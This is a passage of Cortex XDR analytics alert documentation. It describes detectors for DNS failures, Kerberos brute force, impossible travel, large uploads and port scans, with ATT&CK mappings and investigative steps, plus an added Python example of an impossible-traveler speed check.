Severity Low

Description
The endpoint is performing DNS lookups that are failing at an excessively high rate when compared to
its peer group. This alert might be symptomatic of malware that is trying to connect to its command and
control (C2) servers.
The attacker's C2 server runs on one or more domains that can eventually be identified and blacklisted. To
avoid this, malware will sometimes use Domain Generation Algorithms (DGA) that produce many domain
names every day. Because only a few of these domains are ever registered, the installed malware must
blindly try to access each generated domain name in an effort to locate an active one.

Attacker's Goals
Communicate with malware running on your network to control malware activities, perform software
updates on the malware, or to take inventory of infected machines.

Investigative Actions
• Make sure your DNS servers are not misconfigured and are responsive. This detector assumes that
most DNS lookups succeed, and will only raise an alert when it sees large numbers of failed lookups.
Misconfigured or unresponsive DNS servers can result in a false positive.
• Make sure you do not have external domains configured as internal domains. This can result in clients
attempting to (for example) resolve google.com.local first, before resolving google.com. This can result in
a false-positive for this alert.

• Make sure the endpoint is configured properly for your DNS servers. For example, make sure it is
configured to use the correct DNS IP address, and that the IP address is not for a firewalled DNS server.
Misconfigured DNS clients can result in many failed lookups, which will result in a false-positive for this
alert.
• Make sure the endpoint is not a DNS, Proxy, NAT or VPN gateway server. If these have been
misdetected by Cortex XDR Analytics, then their ordinary operations can trigger this alert.

Failed Login For Locked-Out Account
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Defense Evasion (TA0005)

ATT&CK Technique Valid Accounts (T1078)

Severity Low

Description
A locked-out user account (event ID 4725 or 4740) was used in a Kerberos TGT pre-authentication
attempt.

Attacker's Goals
Authenticate using the principal in the TGT, not knowing that it has been revoked.

Investigative Actions
• Check whether you have issues with your Directory Sync Services failing to sync data from Active
Directory.
• Check whether the attempts to use the principals (user accounts) specified in the alert are legitimate; for
example, a user or a script may not have been updated after the account was revoked.
• The lockout can be temporary, for example, in the case of too many login attempts, and may not be
visible after the account was released.
• Search for Windows Event Log 4740 to ascertain whether the account was locked out during the time of
the alert.

Failed Login For a Long Username With Special Characters
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Exploit Public-Facing Application (T1190)

Severity Medium

Description
A long username containing special characters failed to log in to the domain.

Attacker's Goals
An attacker is trying to get code execution on internet-facing assets through command injection.

Investigative Actions
• Check the host and/or user triggering these failed attempts:
• Is the host running internet-facing services?
• Are we looking at sanctioned vulnerability scanning?

First SSO access from ASN for user
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: AzureAD, Okta, or PingOne

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Informational

Description
A user attempted to authenticate via SSO with a new ASN.

Attacker's Goals
Use an account that was possibly compromised to gain access to the network.

Investigative Actions
• See whether the service authentication was successful.
• Confirm that the activity is benign (e.g. the user has switched locations and providers).
• Verify if the ASN is an approved ASN to authenticate from.
• Follow further actions done by the user.

First SSO access from ASN in organization
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: AzureAD, Okta, or PingOne

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Low

Description
An SSO authentication was attempted with a new ASN.

Attacker's Goals
Use an account that was possibly compromised to gain access to the network.

Investigative Actions
• See whether the service authentication was successful.
• Confirm that the activity is benign (e.g. the provider or location is allowed or a new user).
• Verify if the ASN is an approved ASN to authenticate from.
• Follow further actions done by the user.

First connection from a country in organization
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• AzureAD, Okta, or PingOne
• XDR Agent, AzureAD, or Okta

Required Detection Modules Identity Analytics

ATT&CK Tactic
• Credential Access (TA0006)
• Resource Development (TA0042)

ATT&CK Technique
• Compromise Accounts (T1586)
• Brute Force: Password Guessing (T1110.001)

Severity Low

Description
A user connected from an unusual country that no one from this organization has connected from before.
This may indicate the account was compromised.

Attacker's Goals
Gain user-account credentials.

Investigative Actions
Check if the user is currently located in the aforementioned country, or routed their traffic there via a VPN.

High Connection Rate
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 4 Hours

Deduplication Period 4 Hours

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs, XDR Agent, Corelight, or
Third-Party Firewalls

Required Detection Modules No module required

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique Network Service Scanning (T1046)

Severity Low

Description
The endpoint performed an unusually large number of successful connections to typically abused ports on
one or more remote endpoints.
An attacker may be trying to brute force and gain access to a resource by using different credentials or by
trying different services. In some cases, SQL injection attempts may create many sessions. Another case
may be an attacker downloading a significant amount of data from the destination.

This detection model assumes normal users do not initiate numerous connections to specific
destinations and ports, and that many users are not initiating multiple sessions to those ports
on a routine basis.

Attacker's Goals
This alert could indicate any of the following:
• An attacker is scraping data services for useful data.
• The attacker might be seeking authentication credentials using a brute force username and password
attack against the service.
• The attacker might be using fuzz testing to look for vulnerabilities on the remote endpoint. Fuzz testing
sends unexpected, invalid, and/or random data to software. In this context, the attacker is likely using
the fuzzer in an attempt to discover buffer overflow vulnerabilities in the server.

Investigative Actions
• Examine Alert Details > Overview to identify the source endpoint, process running the scan, and process
owner, to determine who or what is performing the network activity.
• Examine the endpoint profile to identify the process that is being used for the suspicious connections.

Impossible traveler
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Hour

Deduplication Period 7 Days

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• AzureAD, Okta, or PingOne
• XDR Agent, AzureAD, or Okta
For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules Identity Analytics

ATT&CK Tactic
• Credential Access (TA0006)
• Resource Development (TA0042)

ATT&CK Technique
• Compromise Accounts (T1586)
• Brute Force: Password Guessing (T1110.001)

Severity Low

Description
A user connected from multiple remote countries in a short period of time, which should normally be
impossible. This may indicate the account is compromised.

Attacker's Goals
Gain user-account credentials.

Investigative Actions
Check if the user routed their traffic via a VPN, or shared their credentials with a remote employee.
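The following is an added example, not Palo Alto Networks code, of the travel-speed check behind an impossible-traveler alert: consecutive logins of one user from different countries are compared, and a pair whose implied great-circle speed could not be achieved by travel is flagged. The login events, coordinates and the 1000 km/h threshold are constructed assumptions; as the investigative action above notes, a VPN egress in another country produces the same pair, so a finding is a lead to verify rather than a verdict.

```python
"""Added example (not Palo Alto Networks code): an impossible-traveler
check that compares consecutive logins of the same user from different
countries and flags pairs whose implied travel speed is not physically
plausible, over constructed SSO login events."""
import math
from collections import defaultdict
from datetime import datetime

EARTH_RADIUS_KM = 6371.0088
# Assumed threshold: faster than any airliner. Not a value from the reference.
MAX_PLAUSIBLE_SPEED_KMH = 1000.0


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two latitude/longitude points, in km."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def impossible_travel(events, max_speed_kmh=MAX_PLAUSIBLE_SPEED_KMH):
    """events: list of dicts with user, ts (datetime), country, lat, lon.

    Only consecutive logins from *different* countries are evaluated, as the
    alert is about multiple remote countries; a same-country hop is ignored
    even when it is fast."""
    by_user = defaultdict(list)
    for ev in events:
        by_user[ev["user"]].append(ev)

    findings = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        for prev, cur in zip(evs, evs[1:]):
            if prev["country"] == cur["country"]:
                continue
            hours = (cur["ts"] - prev["ts"]).total_seconds() / 3600.0
            km = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
            # Two logins at the same instant from different countries can
            # never be explained by travel, so treat the speed as infinite.
            speed = km / hours if hours > 0 else math.inf
            if speed > max_speed_kmh:
                findings.append({"user": user, "from": prev["country"],
                                 "to": cur["country"], "km": round(km, 1),
                                 "kmh": round(speed, 1)})
    return findings


def build_sample_events():
    """Constructed logins. alice: US then DE 40 minutes later (flagged).
    bob: FR then GB three hours later (plausible). carol: two US cities
    an hour apart (same country, not evaluated)."""
    def login(user, hh, mm, country, lat, lon):
        return {"user": user, "ts": datetime(2021, 7, 7, hh, mm),
                "country": country, "lat": lat, "lon": lon}
    return [
        login("alice", 9, 0, "US", 37.35, -121.95),   # Santa Clara
        login("alice", 9, 40, "DE", 50.11, 8.68),     # Frankfurt
        login("bob", 9, 0, "FR", 48.86, 2.35),        # Paris
        login("bob", 12, 0, "GB", 51.51, -0.13),      # London
        login("carol", 9, 0, "US", 40.71, -74.01),    # New York
        login("carol", 10, 0, "US", 42.36, -71.06),   # Boston
    ]


if __name__ == "__main__":
    for finding in impossible_travel(build_sample_events()):
        print(finding)
```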

Interactive local account enumeration
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Hour

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic
• Discovery (TA0007)
• Credential Access (TA0006)

ATT&CK Technique
• Account Discovery (T1087)
• Brute Force (T1110)

Severity Informational

Description
Multiple non-existent accounts failed interactive local logins to a host in a short period of time. This may
indicate an attacker has physical access to the host and is trying to enumerate accounts.

Attacker's Goals
Discover valid accounts to gain credentials.

Investigative Actions
Check if the login attempts were part of a legitimate misunderstanding of the system or part of an attack.

Interactive login by a machine account
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Low

Description
A machine account performed an interactive or remote interactive login.

Attacker's Goals
Use an account that has access to resources to move laterally in the network and access privileged
resources.

Investigative Actions
• See whether the login was successful.
• Check whether the account has done any administrative actions it should not usually do.
• Look for more logins and authentications by the account throughout the network.

Interactive login by a service account
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Low

Description
A service account performed an interactive or remote interactive login.

Attacker's Goals
Use an account that has access to resources to move laterally in the network and access privileged
resources.

Investigative Actions
• See whether the login was successful.
• Check whether the account has done any administrative actions it should not usually do.
• Look for more logins and authentications by the account throughout the network.

Kerberos Pre-Auth Failures by Host
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 10 Minutes

Deduplication Period 1 Hour

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique Brute Force (T1110)

Severity Medium

Description
The endpoint failed an unusual number of Kerberos pre-authentications (TGT requests) from at least three
users when compared to its baseline. This can indicate a password-spraying attack.

Attacker's Goals
The attacker is attempting to gain an initial foothold in the domain using a list of valid users and a guessed
password.

Investigative Actions
• Verify whether the host that generated the alert is normally used by many users (for example, a terminal
server).
• Verify any later authentication success for the user accounts referenced by the alert, as these can
indicate the attacker managed to guess the credentials.

Kerberos Pre-Auth Failures by User and Host
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 10 Minutes

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique Brute Force (T1110)

Severity Low

Description
The user account on this host failed Kerberos pre-authentications (TGT requests) an unusual number of
times. This can indicate a Kerberos brute-force attack.

Attacker's Goals
The attacker is attempting to guess the credentials for the user account.

Investigative Actions
• Verify that the password for the account has not been changed recently, without updating the user or
the program using it.
• Verify any later authentication success for the user accounts referenced by the alert, as these can
indicate the attacker managed to guess the credentials.

Kerberos Traffic from Non-Standard Process
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent


For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique Network Service Scanning (T1046)

Severity Medium

Description
Kerberos traffic is normally generated by a standard set of privileged processes over designated ports.
The endpoint had a non-standard process communicating over ports normally used by Kerberos. An
attacker might be moving laterally by using tools that implement a custom version of the Kerberos protocol.

Attacker's Goals
This might be symptomatic of an attacker's lateral movement. The attacker could be:
• using a custom protocol implementation that offers malicious functionality
• using a protocol other than SMB or Kerberos that still uses the SMB or Kerberos well-known ports.
Either way, the attacker's goal is to gain access to another endpoint on your network. The attacker could
also be surveying your network by performing service scans over the well-known SMB or Kerberos ports.

Investigative Actions
• Make sure the process is not a scanner that implements its own version of the protocol, and that the
scanner is used for sanctioned purposes (for example, nmap enumerating SMB).
• Make sure the process is not a sanctioned security product that creates standalone binaries for its own
use (for example, Illusive Networks honeypots).

• Investigate the process to see if the high-level language used to implement the application is the source
of the alert. Some high-level programming languages provide their own protocol implementations; for
example, Java ships its own Kerberos implementation.
• Examine the endpoint to see if it is infected with malware. If the parent-child chain of initiating
processes has been infiltrated by a malicious replacement, that replacement could be known malware.

Kerberos User Enumeration
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Hour

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique Account Discovery (T1087)

Severity Medium

Description
A high number of Kerberos "principal unknown" errors were generated for users in the last hour. This may be
indicative of Kerberos user enumeration.

Attacker's Goals
The attacker may attempt to gain an initial foothold in the domain by enumerating users and finding service
accounts.

Investigative Actions
• Check whether any service principal names (SPNs) were set incorrectly, as these will always return a
principal unknown error.

LOLBIN connecting to a rare host
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent


For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Command and Control (TA0011)

ATT&CK Technique Application Layer Protocol (T1071)

Severity Medium

Description
A LOLBIN connected to an external IP address or host that is rarely connected to from the organization.

Attacker's Goals
Beacon to C2 server and/or exfiltrate data.

Investigative Actions
Check whether the process was injected to or otherwise subverted for malicious use.

LOLBIN spawned by an Office executable connected to a rare external host
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• Palo Alto Networks Firewall Logs
• XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Command and Control (TA0011)

ATT&CK Technique Application Layer Protocol (T1071)

Severity Medium

Description
A LOLBIN run by an Office process connected to an external IP address or host that is rarely connected
to from the organization.

Attacker's Goals
Attackers may abuse Office executables to run LOLBINs, which can be used for command and control or
for dropping malware.

Investigative Actions
• Check the destination host reputation.
• Check if the process execution and connections are legitimate.

Large Upload (FTP)
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 3 Days

Deduplication Period 3 Days

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Exfiltration (TA0010)

ATT&CK Technique Exfiltration Over Alternative Protocol (T1048)

Severity Low

Description
The endpoint transferred an excessively large amount of data to a single destination over FTP. That
destination server is uncommon for endpoints in your organization.
An attacker may be exfiltrating data directly to the internet.

The data limit used to trigger this alert is predetermined, and is not computed from baseline
activity seen on your network.

Attacker's Goals
Transfer data they have stolen from your network to a location that is convenient and useful to them.

Investigative Actions
• Verify that the source is not an FTP server. If Cortex XDR Analytics has failed to identify the entity as a
valid FTP server, this alert is likely to be a false positive.
• Identify the entity performing the data transfer to determine if the transfer is sanctioned.
• Use Pathfinder to interrogate the endpoint for suspicious artifacts that are using endpoint processes or
loaded modules.

Large Upload (Generic)
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Day

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• Palo Alto Networks Firewall Logs
• XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Exfiltration (TA0010)

ATT&CK Technique Exfiltration Over Alternative Protocol (T1048)

Severity Low

Description
The endpoint transferred large amounts of data to an external site using a protocol other than HTTP/S,
FTP, or SMTP. (A specific detector is used for each of those protocols.) Cortex XDR Analytics assumes that
data transfers out of your network are ordinarily performed using one of those three services, so it expects
data transfers over all other ports to be low. For the same reason, Cortex XDR Analytics also assumes that
endpoint traffic towards a specific destination should remain about the same over long periods of time. An
attacker may be exfiltrating data directly to the internet.

Attacker's Goals
Transfer data they have stolen from your network to a location that is convenient and useful to them.

Investigative Actions
• Check whether the traffic is SSH activity over that protocol, which can trigger this alert. It is possible that
someone on your network is legitimately engaged in SSH activity.
• Check if the traffic is to/from a misconfigured network.
• Check if the traffic is to a new external service or server that has recently been adopted for use by an
organization in your enterprise.
• Identify the process/user performing the data transfer to determine if the transfer is sanctioned.

Large Upload (HTTPS)
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Day

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Exfiltration (TA0010)

ATT&CK Technique Exfiltration Over Alternative Protocol (T1048)

Severity Low

Description
The endpoint transferred an excessive amount of data to an external site over HTTPS. The destination is
not a popular upload site for endpoints on your network, and the endpoint performing the upload has not
previously downloaded a large amount of data from the site. The upload is considered excessive based
on comparison to baseline measurements of HTTPS data transfers on your network. An attacker may be
exfiltrating data directly to the internet.

Attacker's Goals
Transfer data they have stolen from your network to a location that is convenient and useful to them.

Investigative Actions
• Check if this alert has been falsely triggered by DNS load balancers. If an endpoint routinely uploads data
to a site that makes use of load balancers, the transfer might ordinarily be split into multiple sessions and
across multiple subdomains, which can cause the baseline measurement to be incorrect. In that situation,
a routine upload that randomly places the bulk of the data in a single session to a single subdomain can
look excessive to the Cortex XDR Analytics detector.
• Check if the device performing the data transfer is a mobile phone performing a backup. Cortex XDR
Analytics will not always measure the baseline properly for mobile devices, especially if the backups are
performed infrequently and contain a great deal of data. If the data transfer is a mobile device running a
backup, check to ensure that only appropriate data is included in the backup.
• Identify the process/user performing the data transfer to determine if the transfer is sanctioned.

Large Upload (SMTP)
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Day

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Exfiltration (TA0010)

ATT&CK Technique Exfiltration Over Alternative Protocol (T1048)

Severity Low

Description
The endpoint, which is not an internal SMTP server, emailed an excessive amount of data from your
network.
An attacker may be exfiltrating data directly to the internet.

The amount of data contained in the email exceeds a predetermined limit.

Attacker's Goals
Transfer data they have stolen from your network to a location that is convenient and useful to them.

Investigative Actions
• Identify the process/user performing the data transfer to determine if the transfer is sanctioned.

Login Password Spray
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Hour

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique Brute Force: Password Spraying (T1110.003)

Severity Low

Description
An agent tried to authenticate to an unusually high number of user accounts within a short period of time.
This may have resulted from a login password spray attack.

Attacker's Goals
An attacker may be attempting to gain unauthorized access to user accounts.

Investigative Actions
• Check the amount of time between each authentication attempt.
• Investigate the reason behind the login failures and if any accounts were locked out.
• Look for any successful authentication attempts and the ratio of login success versus login failures.

Login by a dormant user
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Defense Evasion (TA0005)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Informational

Description
A dormant user logged on after having been unused for a month or longer. This may indicate the account is
misused by an attacker.

Attacker's Goals
Use a compromised user account that has not been used for a long while and is therefore less likely to
be noticed.

Investigative Actions
• Confirm that the activity is benign (e.g. the user returned from a long leave of absence).
• See whether there are other abnormal actions by the user (e.g. files, commands, or other logins).
• Check whether you have issues with your Directory Sync Services failing to sync data from Active
Directory.

MSBuild Makes a Rare Network Connection
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent


For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Defense Evasion (TA0005)

ATT&CK Technique Trusted Developer Utilities Proxy Execution: MSBuild (T1127.001)

Severity Low

Description
MSBuild normally does not make any network connections. This unusual activity may be malicious since
attackers can leverage MSBuild for executing code.

Attacker's Goals
Attackers can use MSBuild to proxy execution of code.

Investigative Actions
• Check whether the execution is benign or normal for the host and/or user performing it.
• Check whether the connection is to a legitimate destination.

Microsoft Office Process Spawning a Suspicious One-Liner
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic • Execution (TA0002)
• Initial Access (TA0001)

ATT&CK Technique • User Execution (T1204)
• Phishing: Spearphishing Attachment (T1566.001)

Severity Medium

Description
A Microsoft Office process spawned a commonly abused process with a full command (not a script), a
behavior that is typically malicious.

Attacker's Goals
An attacker is trying to gain code execution on the host.

Investigative Actions
Check whether the command line executed is benign or normal for the host and/or user performing it. For
example, employees working in finance may have legitimate use cases for complex Excel commands.

Microsoft Office process spawns a commonly abused process
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic • Execution (TA0002)
• Initial Access (TA0001)

ATT&CK Technique • User Execution (T1204)
• Phishing: Spearphishing Attachment (T1566.001)

Severity Low

Description
A Microsoft Office process spawned a commonly abused process with an uncommon command.

Attacker's Goals
An attacker attempts to gain code execution via a phishing document.

Investigative Actions
• Check the source of the document (received by mail or loaded locally).
• Investigate the child processes for malicious activity and network connections to an external host.

Mshta.exe launched with suspicious arguments
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Defense Evasion (TA0005)

ATT&CK Technique Signed Binary Proxy Execution: Mshta (T1218.005)

Severity Medium

Description
The Microsoft HTML Application Host process (mshta.exe) was launched with suspicious arguments, which
may indicate malicious intent.

Attacker's Goals
Gain code execution on the host and evade security controls.

Investigative Actions
Check whether the executing process is benign, and if this was a desired behavior as part of its normal
execution flow.

Multiple Rare Process Executions in Organization
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Hour

Deduplication Period 30 Days

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique User Execution (T1204)

Severity Informational

Description
Multiple unusual processes were executed in the organization. This may be indicative of a compromised
account.

Attacker's Goals
Unusual processes may be executed for various purposes, including exfiltration and lateral movement.

Investigative Actions
Investigate the processes that were executed to determine if they were used for legitimate purposes or
malicious activity.

Multiple Weakly-Encrypted Kerberos Tickets Received
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 10 Minutes

Deduplication Period 1 Hour

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique Steal or Forge Kerberos Tickets: Kerberoasting (T1558.003)

Severity Low

Description
A user accessed a number of services associated with user accounts in the 10 minutes leading to the alert,
generating a number of weakly encrypted Kerberos TGS (ticket granting service) tickets that is significantly
larger than the number of weakly encrypted TGS tickets received by that user in the 30 days leading to the
alert. Services associated with user accounts are a common target for Kerberoasting due to default weak
encryption.

Attacker's Goals
Crack account credentials by obtaining easy-to-crack Kerberos tickets.

Investigative Actions
Check who used the host at the time of the alert, to rule out a benign service or tool accessing those
services.

Multiple discovery commands
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 10 Minutes

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique • Remote System Discovery (T1018)
• System Information Discovery (T1082)
• System Network Configuration Discovery (T1016)
• System Service Discovery (T1007)

Severity Low

Description
The alerted process performed multiple consecutive discovery commands in a short time frame.

Attacker's Goals
Collect information about the host, network and user configuration for lateral movement and privilege
escalation.

Investigative Actions
• Verify if the script or process initiating the discovery commands is benign.
• Verify that this isn't sanctioned IT activity.
• Look for other hosts executing similar commands.

NTLM Brute Force on a Service Account
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 10 Minutes

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• Palo Alto Networks Firewall Logs, XDR Agent, AzureAD, Okta, or
PingOne
• Palo Alto Networks Firewall Logs, XDR Agent, Corelight, or Third-
Party Firewalls

Required Detection Modules Identity Analytics

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique Brute Force (T1110)

Severity Low

Description
A service account attempted to authenticate to a target using NTLM an excessive number of times in a
short period. This may indicate an NTLM brute-force attack.

Attacker's Goals
The attacker attempts to gain access to the service accounts.

Investigative Actions
Verify any successful authentication by the user account referenced by the alert, as these can indicate the
attacker managed to guess the credentials.

NTLM Hash Harvesting
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Hour

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• Palo Alto Networks Firewall Logs, XDR Agent, AzureAD, Okta, or
PingOne
• Palo Alto Networks Firewall Logs, XDR Agent, Corelight, or Third-
Party Firewalls

Required Detection Modules Identity Analytics

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique OS Credential Dumping (T1003)

Severity Medium

Description
An unusual number of users sent NTLM authentication to {auth_target} in the last hour. This may be
indicative of poisoning and NTLM hash harvesting.

Attacker's Goals
The attacker may attempt to extract NTLM hashes for credential access.

Investigative Actions
• Check that the destination is not a server.
• Verify that the destination is not external to the organization.

Network sniffing via command-line tool
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic • Credential Access (TA0006)
• Discovery (TA0007)

ATT&CK Technique Network Sniffing (T1040)

Severity Medium

Description
Attackers may monitor network traffic for cleartext credentials or to learn the network's configuration.

Attacker's Goals
Gain user-account credentials.

Investigative Actions
Check whether the executing process is benign, and if this was a desired behavior as part of its normal
execution flow.

New Administrative Behavior
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 12 Hours

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs, XDR Agent, Corelight, or
Third-Party Firewalls

Required Detection Modules No module required

ATT&CK Tactic Lateral Movement (TA0008)

ATT&CK Technique Remote Services (T1021)

Severity Low

Description
The endpoint performed new administrative actions relative to its previously profiled behavior. Because an
endpoint may only infrequently be used for administrative activities, the analytics are performed using logs
collected over a long period of time and the activity is also compared to that of other endpoints. That is, if
many endpoints contact the same destination with the same administrative activity, that network activity is
less likely to result in this alert.
An attacker may be operating on the host, probing other computers and moving laterally inside the network
using a trusted computer and credentials. Attackers typically exhibit administrative behaviors when
performing reconnaissance and lateral movement.

Attacker's Goals
An attacker is using administrative functions to move from one endpoint to another, or to scan the network
for new endpoints to attack.

Investigative Actions
Investigate the endpoint to determine if it is legitimately being used for administrative functions.

Port Scan
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Hour

Deduplication Period 1 Hour

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs, XDR Agent, Corelight, or
Third-Party Firewalls

Required Detection Modules No module required

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique Network Service Scanning (T1046)

Severity Medium

Description
The endpoint connected, or attempted to connect, to multiple privileged ports (lower than port 1024),
which are infrequently used by other endpoints (i.e. destination ports that are normally used by many
endpoints will not raise this alert).
Attackers perform port scans for reconnaissance purposes, to find computers or servers that accept
connections in these ports, and to find vulnerable services that can be exploited.

Attacker's Goals
An attacker is determining which ports are open or closed on remote endpoints in an attempt to identify the
endpoint operating system, firewall configuration, and exploitable services.

Investigative Actions
• New endpoints that use multiple ports can cause a false positive. Ensure that the endpoint is not new
on the network, and is not hosting services such as FTP servers or domain controllers that are being
contacted for the first time.
• Check if the activity is a SYN-ACK scan. These might result in Cortex XDR Analytics detecting the scan
as coming from the wrong direction, which could mean that Cortex XDR Analytics used the wrong baseline
when triggering the alert.
• Check for portmap and/or X11 usage. These usually open multiple ports. If the protocol usage for the
